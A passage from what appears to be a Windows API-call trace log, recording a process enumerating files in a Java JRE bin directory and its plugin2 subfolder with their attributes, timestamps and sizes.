ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x83640, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_font_t2k.dll", cAlternateFileName="JAVAFX~2.DLL")) returned 1 [0179.322] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1f440, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_iio.dll", cAlternateFileName="JAVAFX~3.DLL")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x0, dwReserved1=0x0, cFileName="javaw.exe", cAlternateFileName="")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e040, dwReserved0=0x0, dwReserved1=0x0, cFileName="javaws.exe", cAlternateFileName="")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="java_crw_demo.dll", cAlternateFileName="JAVA_C~1.DLL")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jawt.dll", cAlternateFileName="")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="JAWTAccessBridge-64.dll", cAlternateFileName="JAWTAC~1.DLL")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x31440, dwReserved0=0x0, dwReserved1=0x0, cFileName="jdwp.dll", cAlternateFileName="")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.dll", cAlternateFileName="")) returned 1 [0179.323] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22240, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfxmedia.dll", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7511d3f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7511d3f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2794a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfxwebkit.dll", cAlternateFileName="JFXWEB~1.DLL")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jjs.exe", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2aa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jli.dll", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa897bfc2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x48440, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2iexp.dll", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa897bfc2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa897bfc2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1b640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2launcher.exe", cAlternateFileName="JP2LAU~1.EXE")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2native.dll", cAlternateFileName="JP2NAT~1.DLL")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2ssv.dll", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpeg.dll", cAlternateFileName="")) returned 1 [0179.324] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdt.dll", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsound.dll", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsoundds.dll", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x35e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="kcms.dll", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="keytool.exe", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="kinit.exe", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="klist.exe", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="ktab.exe", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39040, dwReserved0=0x0, dwReserved1=0x0, cFileName="lcms.dll", cAlternateFileName="")) returned 1 [0179.325] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x0, dwReserved1=0x0, cFileName="management.dll", cAlternateFileName="MANAGE~1.DLL")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlib_image.dll", cAlternateFileName="MLIB_I~1.DLL")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xec40, dwReserved0=0x0, dwReserved1=0x0, cFileName="nio.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="npt.dll", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="orbd.exe", cAlternateFileName="")) returned 1 [0179.326] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="pack200.exe", cAlternateFileName="")) returned 1 [0179.327] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugin2", cAlternateFileName="")) returned 1 [0179.327] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4380050 [0179.327] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\*", lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2fd8 [0179.327] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.327] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0179.327] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npjp2.dll", cAlternateFileName="")) returned 1 [0179.327] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npjp2.dll", cAlternateFileName="")) returned 0 [0179.327] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0179.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0179.327] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x0, dwReserved1=0x0, cFileName="prism_common.dll", cAlternateFileName="PRISM_~1.DLL")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1fe40, dwReserved0=0x0, dwReserved1=0x0, cFileName="prism_d3d.dll", cAlternateFileName="PRISM_~2.DLL")) returned 1 [0179.328] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17e40, dwReserved0=0x0, 